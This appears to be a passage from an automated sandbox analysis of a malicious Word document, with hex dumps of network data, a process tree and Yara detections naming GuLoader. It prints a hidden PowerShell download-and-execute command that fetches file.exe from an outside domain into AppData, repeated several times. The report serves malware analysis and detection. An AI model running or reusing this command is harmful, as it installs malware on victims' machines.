c9 1e 8c 09 ef aa f1 3d f0 04 90
                                                          Data Ascii: jdx)5/4o'XNl3|~-x+*lkg4^IjDB\~FlF)\hb{[7wGQ$-<6CK_Fb}*|e_9i/7e`Bk6.Z-|78{=xS:ZuO3=
                                                          2023-03-18 04:35:12 UTC1157INData Raw: 23 7c 45 9e f2 d0 e4 4a e2 9d 7a ee 8c d9 f5 4c bb 52 a6 4d 8b 7b 38 d5 ee 61 85 81 97 52 ef 64 46 5a d3 72 66 00 a3 b1 c9 30 0c e6 22 a7 80 27 c5 c8 64 9c 26 a1 b6 20 d0 28 ad c9 79 22 9e 4d be 24 ff ce 81 25 f8 bb 58 3c 28 3c 2d 95 e1 99 16 c8 e4 3e b3 a4 27 0e ab 20 a4 c4 ae 15 c4 2b b1 11 6f eb 56 27 1c a8 89 8c b6 59 f3 0a 71 45 ea a4 ab fc 99 10 62 02 6b 8f dd e8 04 f5 1c d4 47 97 c7 c1 5b 24 bf cd 88 5d b3 1c ed 8b 66 b7 2f 07 da b9 55 7c 55 fc 75 f1 f2 65 d5 ce ae ea ab ca ef 64 76 d8 d9 31 be 18 7f 0a bb c1 19 6e 86 86 d3 5c 78 75 74 88 ee c8 39 40 23 09 b7 ba 37 3d 28 c3 c4 c9 ea 42 e0 26 0a ab 9b 69 4a 1b 28 bf 21 2f 24 a0 4c 2b d7 78 2b e7 f7 d1 d1 66 4c 97 6a d0 c8 e1 2e 65 6c e0 21 41 1a 8e 68 de 20 76 5b 5e b0 1a 96 b7 09 14 bc 34 96 ef d1
                                                          Data Ascii: #|EJzLRM{8aRdFZrf0"'d& (y"M$%X<(<->' +oV'YqEbkG[$]f/U|Uuedv1n\xut9@#7=(B&iJ(!/$L+x+fLj.el!Ah v[^4
                                                          2023-03-18 04:35:12 UTC1173INData Raw: 3f c4 f0 ce 04 a0 63 90 96 2f 9d c5 d4 67 5a d6 09 90 0a d6 6b 25 25 80 4e 0b d4 ef 96 60 96 94 44 72 13 20 4f ee 49 30 c7 32 89 2c 42 3b 8b ed aa 84 53 2e 33 ce 4f 24 b4 a3 b9 f4 66 c2 59 57 18 29 49 04 7f d8 a8 61 1f 2f 58 e8 f6 f8 7c 9b 08 52 a8 5d 66 88 bf 26 42 88 7f 21 65 21 3a 93 16 de 66 b8 ff 3c 4e 95 0e 91 f5 ab d0 37 c2 08 3e cd ad 92 8f 93 0a 29 3d 9d 04 e3 d1 97 49 c5 d4 fe 6d 12 f4 ba 7f 20 15 7d b5 4a 02 ea cc a7 d2 a8 3a d0 1b c7 d7 81 70 bf 4f 06 9f 6f a7 bd 94 8f 1b eb 6f f7 25 03 fd 1c fd 79 0f 29 cc 10 cc 9c f9 23 39 29 40 22 0d eb 36 a1 b4 45 dd 96 94 b6 ab db 96 d2 9e 75 3b 52 3a b8 6e 37 4a 47 d7 bd 23 40 21 93 eb f6 a7 74 5a dd c1 94 33 af 2e d4 96 95 48 9f 44 ba 1b e9 c1 ba 77 05 d0 1c 4b 81 50 3a 20 fd 5a 05 0e 1b 1f e7 a7 1c a6
                                                          Data Ascii: ?c/gZk%%N`Dr OI02,B;S.3O$fYW)Ia/X|R]f&B!e!:f<N7>)=Im }J:pOoo%y)#9)@"6Eu;R:n7JG#@!tZ3.HDwKP: Z
                                                          2023-03-18 04:35:12 UTC1189INData Raw: e3 c8 3b 64 0b 45 59 1c f9 87 94 90 79 ae c9 1c 35 a3 b2 79 ae 19 1c 75 a3 b2 f9 ae d9 1c 0d a5 b2 f9 ae fb 39 9a 44 d1 bd ae 47 cc 98 51 cd 05 ae 8d 1c 2d a3 b2 05 ae a7 39 7a 82 ca 16 ba 76 71 f4 22 95 2d 74 bd ca d1 11 2a bb cf f5 26 47 5f 50 d9 7d ae 77 39 fa 95 ca ee 77 7d cc 91 76 e7 16 8a be e0 28 fc ce 12 b2 c8 75 c1 4c 03 95 2d 72 5d e1 a8 29 95 3d e0 ba ca 51 4f 2a 7b c0 25 e5 32 94 49 65 0f ba 9c 1c 15 50 d9 83 2e 1f 47 4b ee ac 17 f9 90 2b 8a a3 4d 77 36 a2 a8 06 47 2f 52 77 8b 5d 89 1c bd 4f dd 2d 76 a5 72 f4 1d 95 2d 71 b5 e0 48 1a ba 85 a2 f6 1c 55 1a 5a 42 96 ba ba 73 14 4f 65 4b 5d fd 39 6a 49 65 cb 5c 43 39 ea 43 65 cb 5c 63 38 ca 1a 7a 55 5a ee ca e1 68 fa d0 eb 14 4d e3 68 21 75 b7 c2 55 c4 d1 63 d4 dd 0a d7 0a 8e 9e a3 b2 95 ae 47 39
                                                          Data Ascii: ;dEYy5yu9DGQ-9zvq"-t*&G_P}w9w}v(uL-r])=QO*{%2IeP.GK+Mw6G/Rw]O-vr-qHUZBsOeK]9jIe\C9Ce\c8zUZhMh!uUcG9
                                                          2023-03-18 04:35:12 UTC1205INData Raw: a8 e2 dc 01 f0 78 26 80 6a 9f 32 0a b1 8b 98 24 88 8b 5f 46 0f 17 e5 f7 f7 40 a5 38 ba 2f 90 30 3b f1 e4 61 a4 06 33 53 15 aa 27 3d a5 cd 89 07 b9 64 c4 ea 8c d0 60 d9 5d c8 9a 38 4c 13 2e ea 2f ba aa 3b 97 1d 2f 6c 95 47 bf 3c f6 60 a4 62 b8 4b fd 2a 99 12 23 18 4f dc 5b c4 52 86 20 21 8a e5 0a 23 17 ec 64 11 81 be 66 29 24 cd 49 1c 90 9a 2e 4e a2 ed 91 61 a6 0c 11 29 d1 f7 a4 72 93 19 33 42 f6 76 b1 e8 db 2b 90 0a ac 86 84 24 0f ae fa 90 10 3c b7 91 a7 9b 30 78 d1 8e 8a 9e 68 86 ed 99 c2 24 9a 04 0d 29 ed bf 09 02 62 a4 98 2a a7 b7 67 2a a9 b1 6c 2e b3 35 93 2b 21 cf 40 f0 8d 93 d9 1c ca 16 1a b4 17 14 8b f9 10 41 3a ab 07 c2 24 4c e9 2f 17 c7 cb 19 d7 35 54 ee 2b 1a d6 21 42 a8 ba 90 7a 6e b1 1c 22 a1 32 db 8b 93 6e 95 80 c7 a8 0d 17 4a 57 b9 77 6a 34
                                                          Data Ascii: x&j2$_F@8/0;a3S'=d`]8L./;/lG<`bK*#O[R !#df)$I.Na)r3Bv+$<0xh$)b*g*l.5+!@A:$L/5T+!Bzn"2nJWwj4
                                                          2023-03-18 04:35:12 UTC1221INData Raw: 55 61 12 b5 61 12 10 5d 31 92 73 18 1f f4 48 d0 38 81 51 8b 72 53 d1 95 2d 48 22 a6 2c c1 38 0c 3f e2 f2 30 be 33 37 01 d3 c1 66 6e 22 b9 46 d6 71 b3 16 5b 73 a4 af 03 c6 e4 d1 4c 12 9e 5c cb c5 c5 41 4a ec 57 92 20 25 09 52 92 20 a5 e6 28 44 ee 95 b1 a1 df 3f ff 0f 47 15 de 6f b1 90 9f 21 5e 69 6f 9b b9 4d 3f df 4f d3 17 ab d8 77 91 30 78 94 9c 3f 24 e7 47 08 dc 4d ce 27 48 36 7c 92 c0 7d 04 1e 80 02 de 43 f4 1b 48 27 3f 28 83 e2 41 5a 93 98 3b 48 53 d7 dc 3d 14 f3 8b 04 be 4a e0 1b 04 be 4d e0 11 8a f0 26 29 f7 9b 08 17 d9 37 77 2d e1 6f 15 fc ad 84 df 20 38 65 30 f3 98 64 f0 18 d1 6f 14 3a 1b 03 37 0b 7e 33 e1 b7 0a 4e 2b d8 73 77 08 7e 07 c5 7d 5c e2 3e 4e f4 3b 85 7e a7 ae f7 93 22 e5 1e d0 ce 9f c5 68 ed b6 3d 41 06 0c 91 f1 c7 cb 1d 33 cf 26 48 0d
                                                          Data Ascii: Uaa]1sH8QrS-H",8?037fn"Fq[sL\AJW %R (D?Go!^ioM?Ow0x?$GM'H6|}CH'?(AZ;HS=JM&)7w-o 8e0do:7~3N+sw~}\>N;~"h=A3&H
                                                          2023-03-18 04:35:12 UTC1237INData Raw: f8 f1 a6 6c 17 f1 e0 19 7f 8e da 5a d3 e5 40 7e 4a bd 3f ee 40 c6 45 4d 9d a0 d7 e8 f4 53 f3 72 74 e9 33 35 a9 b9 39 f9 53 e3 0b 32 8c 79 9a 7c 83 7e aa 79 c5 aa cb 2f 97 ff b2 76 f9 a5 4f 76 4e 9d 98 a3 37 a6 e7 ca c7 1b 8c 99 39 05 f2 30 45 e8 93 53 b5 ba 82 59 9a 0c 20 64 2e 35 7a d4 53 8b fa 47 4c 1d a7 c9 d5 a4 eb 35 42 7c 88 36 93 d9 9f ae ec c1 76 c4 ef e8 19 11 97 ac c2 5b 68 f2 24 f6 9b 0c 01 79 44 7a f9 34 da 0f 3c 2e 40 a1 e0 d2 00 37 46 cc e3 8a ac bf f1 10 92 83 bf a9 10 f0 24 b3 0f 1c 7e 6b 5c 88 42 91 91 05 4e fd f9 19 f4 27 16 42 e2 c6 25 07 a4 c4 c5 12 5d b3 c5 4d 21 eb 2e 1b 5c 22 a1 bb 67 8b 23 74 30 29 0a 70 6a 42 e7 6c 8b 23 74 9e 36 b8 64 42 e7 63 8b 23 74 72 c0 9d 77 01 1c fb 9d 09 1c 8b b7 44 7c 3c 00 2f 90 10 fb ed e5 60 c5 cd 9f
                                                          Data Ascii: lZ@~J?@EMSrt359S2y|~y/vOvN790ESY d.5zSGL5B|6v[h$yDz4<.@7F$~k\BN'B%]M!.\"g#t0)pjBl#t6dBc#trwD|</`
                                                          2023-03-18 04:35:12 UTC1253INData Raw: 81 18 52 cf 1f 69 6b 16 c6 00 9e 47 26 8a 27 f0 39 ca 3c bd 52 51 12 e2 67 c7 42 8c e5 be ab 25 ff 63 de 17 39 ff 0d f8 f2 10 fc f5 57 33 ff 63 b7 af 79 f4 14 b7 e4 02 83 09 26 5d 7d 36 13 0c d7 8f 47 73 91 9b 81 c0 c4 b8 eb 4d c9 d7 25 ee 6a 36 3a f0 5e 2e c2 a5 4f 48 44 ef e6 1b e1 51 74 3a 66 76 66 69 9a e9 f8 1c 45 90 82 b6 6c c2 ce 49 9a a7 f4 3a 5c 63 da 6b fa d0 4b 2c fe f2 e3 72 37 7f 9d a8 48 6b 35 7f 76 da a1 fa 77 b0 ff c3 f5 79 40 d8 85 db 19 b5 6e 18 c5 ad e2 1d a4 05 fd a2 90 f6 5b 31 a9 44 bc 7c c6 68 c3 6b 54 32 35 00 a5 e3 58 9c 31 05 69 68 e7 3f 6a 36 e4 50 2a 71 f9 16 a5 84 f7 ff 6d ab 34 58 29 0d 37 53 d1 31 53 aa 60 1b 0d d3 58 13 59 d4 6b dd 83 34 cf 0d 16 f7 f5 30 61 6a dc 34 61 2e 79 dc 50 72 4e 4f 83 5a bb f5 33 14 24 2c d0 f0 f7
                                                          Data Ascii: RikG&'9<RQgB%c9W3cy&]}6GsM%j6:^.OHDQt:fvfiElI:\ckK,r7Hk5vwy@n[1D|hkT25X1ih?j6P*qm4X)7S1S`XYk40aj4a.yPrNOZ3$,
                                                          2023-03-18 04:35:12 UTC1269INData Raw: 17 a3 ab fe 58 ce 5d 95 27 1d 41 43 fe 3d 7e 21 98 f3 51 7f f1 f7 c0 20 ec 59 fc ef 18 cc 8e 77 ba a0 dd b7 93 3d 09 ff c1 2d 3d 7b aa 39 7f 6f 33 c4 8d 6f 34 e0 dc 7c e0 52 f3 2a c1 92 c5 f2 8a a5 ee d2 04 d3 e6 98 3a 76 68 12 de 38 7a 37 15 d7 b7 8c 63 c3 18 df a3 f0 7b 32 7e b7 1b df a5 5c 12 61 a2 3c a7 7c 5f 71 3e 9e 2f 5f ce 6b ea 75 0f 9d 5b be ec 7d 0e f9 fe a9 0f fe 46 be 9c f9 01 c9 97 fb 9f 43 f9 f2 db e7 5a c8 97 8f 7f c0 f2 e5 e7 ff 30 d9 ea e4 0f f8 be 24 8b 29 5f ce b6 d2 9b eb 63 c2 e5 cb 0c 6b b8 7c f9 3e 05 26 fa 2b f9 72 ec 73 2c 5f 1e 5d de 8a 7c 19 76 3f 1b 0c 07 10 f9 79 22 ed 03 be f0 25 91 d7 57 79 80 fb 3c 71 a1 7c 2f d9 7e 5c bb e7 0c 6e bf 62 79 6b dc 7e 6e c4 7a 89 e7 d9 c4 8e e5 16 79 e3 db a6 e5 54 c6 a7 cf 1a 65 3c d8 6a 19
                                                          Data Ascii: X]'AC=~!Q Yw=-={9o3o4|R*:vh8z7c{2~\a<|_q>/_ku[}FCZ0$)_ck|>&+rs,_]|v?y"%Wy<q|/~\nbyk~nzyTe<j
                                                          2023-03-18 04:35:12 UTC1285INData Raw: 3b 57 c6 66 f5 c9 f9 0a 2d 6e d7 67 17 9e 98 71 2f d4 71 22 2d e8 d0 f7 0f f3 45 a7 b9 32 f6 66 aa 2f 56 a5 6c 80 1f 2e 75 e8 b1 91 be 81 69 58 4b 61 3d b1 f7 33 ea 93 c3 68 e7 01 8a df 20 7e 1f 42 2b b4 4b 39 ea cc d8 f4 e8 52 9c 41 7d 79 dd bf 0c 08 26 b0 ea 74 18 bf f6 0d 99 ab 1f 4b 0b 62 2c 5f 05 0a df 8f b5 4c 8f 43 4d 38 a5 1a a3 95 cd 02 11 03 e3 54 e4 f8 a2 3b 49 44 d7 a9 4f fe 60 a1 43 01 9a 6f cc bc 68 4f 73 94 3b dd 2c cf 3b 94 2e d3 d0 ed a7 b5 8c 0d 05 47 42 59 de 23 44 f7 a9 9e 7f 50 e4 b7 aa 80 82 f2 16 94 90 19 05 35 87 e4 b7 cf 30 7f d4 24 dd 7e 46 7a 1b 04 b1 a0 df f0 84 bd c3 6c 61 5c 78 0b d5 f9 18 63 88 3a e1 03 18 e4 b9 b3 6c 0f 83 9a f1 3a 8a 13 4a d0 d0 97 41 ff 7b 9d f5 f1 e5 bc ca 83 e4 14 b7 1e 56 70 71 49 aa 94 61 03 a2 31 34
                                                          Data Ascii: ;Wf-ngq/q"-E2f/Vl.uiXKa=3h ~B+K9RA}y&tKb,_LCM8T;IDO`CohOs;,;.GBY#DP50$~Fzla\xc:l:JA{VpqIa14
                                                          2023-03-18 04:35:12 UTC1301INData Raw: 97 2a b3 1a 97 5c 36 f9 ee 2f 1c 57 3b 6b c6 dd d1 6b df f2 bb 1c 1f 8e eb ed dc f0 8c f5 f3 7d 19 9b 23 fb dd f3 fa e1 de eb 2f 7a 66 7b ee e7 ab 2e 1f f7 d4 c0 1e e9 53 cb 12 2e 9c 7f fd b7 8f b5 7e f6 c2 8c b5 99 bf bc 7f c9 a3 6d df 38 f1 ef 7f fd 50 b8 cd 92 fc d0 e2 bc d2 aa d8 b7 ee 39 af f8 97 fc 97 9e ae 8f 5d fd 23 ab f9 c7 a5 ff 5a 1a ad d3 37 1c 6a b8 75 49 75 7d ec ba cf a2 d9 98 c4 cb dc ad 74 e6 b1 3a 7d dc ed 31 b7 0c 5e 33 72 fc 33 d5 fd 67 98 36 d7 15 c5 e8 cc db e8 f4 95 27 87 66 f7 fe f4 ad d8 97 f6 46 b3 7e 9f b4 e8 5a 78 e6 60 df c4 bd 87 63 6b e7 ab e6 6d 75 f2 ed 75 fa 76 3a fd 27 83 6e 18 7e 5f e6 13 49 77 f6 da 76 c3 19 e7 ac b2 0e af 7e 5a bd fa f9 23 57 3f df d0 7e e0 dd df bf 5a bc ab 83 e3 e5 c5 f1 ce ab 57 7c 17 bd f0 cf fe
                                                          Data Ascii: *\6/W;kk}#/zf{.S.~m8P9]#Z7juIu}t:}1^3r3g6'fF~Zx`ckmuuv:'n~_Iwv~Z#W?~ZW|
                                                          2023-03-18 04:35:12 UTC1317INData Raw: 2d ef be 3f 10 bd e2 bc 16 c3 29 d0 f4 44 e9 c3 88 57 29 55 7b 7b 48 3b 55 39 96 59 a4 b2 1f b1 a2 31 87 8a d5 06 54 c1 0c 87 c9 b0 94 4f b7 4e 1e 4b 7a d2 6c c7 ce 72 b9 de b6 2c c6 71 53 9d 97 b9 56 c6 3f 37 d9 95 d4 87 05 48 fc 10 5b 25 98 b0 e4 9b a1 73 94 80 3c f6 ec b4 f9 6b b1 62 9b 40 f9 f5 6a a8 ce 6d b8 61 82 dd 76 9e 89 a3 bb 61 e6 01 d7 3d 5c b7 e5 98 66 97 04 b3 4d 7f 5c ec 34 18 e7 00 20 2f 10 77 38 83 c4 52 dc ca 4a ea f9 4d ae ae 80 59 d3 81 11 29 c9 ff 49 ac ed 58 15 ee b4 b8 0e 64 28 be ef 51 f4 82 f6 43 c5 6d 1e 4f bc e2 3a a8 7c a1 73 62 51 56 6f 43 c9 77 6d c0 ab 00 6b b8 2b 80 f5 8a ac 26 0e d2 d1 b0 92 74 00 de 3a 24 12 c1 eb cd 80 2d 36 5f f2 55 ac 61 b8 36 53 9a 6c 6d 71 95 4c 93 e9 8c f0 09 ee 6c 1a f9 32 78 5e e1 53 08 8d 86 74
                                                          Data Ascii: -?)DW)U{{H;U9Y1TONKzlr,qSV?7H[%s<kb@jmava=\fM\4 /w8RJMY)IXd(QCmO:|sbQVoCwmk+&t:$-6_Ua6SlmqLl2x^St


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:05:34:16
                                                          Start date:18/03/2023
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                          Imagebase:0x13f020000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:4
                                                          Start time:05:34:20
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x4a870000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:6
                                                          Start time:05:34:20
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x13fb60000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          Reputation:high

                                                          General

                                                          Target ID:7
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:9
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Users\user\AppData\Roaming\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x400000
                                                          File size:676320 bytes
                                                          MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                                                          Antivirus matches:
                                                          • Detection: 6%, ReversingLabs
                                                          Reputation:low

                                                          General

                                                          Target ID:10
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:12
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x13f540000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          Reputation:high

                                                          General

                                                          Target ID:13
                                                          Start time:05:34:38
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:15
                                                          Start time:05:34:39
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:16
                                                          Start time:05:34:39
                                                          Start date:18/03/2023
                                                          Path:C:\Users\user\AppData\Roaming\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x400000
                                                          File size:676320 bytes
                                                          MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:18
                                                          Start time:05:34:39
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x13fa40000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          General

                                                          Target ID:19
                                                          Start time:05:35:09
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:21
                                                          Start time:05:35:10
                                                          Start date:18/03/2023
                                                          Path:C:\Users\user\AppData\Roaming\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x400000
                                                          File size:676320 bytes
                                                          MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:22
                                                          Start time:05:35:36
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\verclsid.exe
                                                          Wow64 process (32bit):false
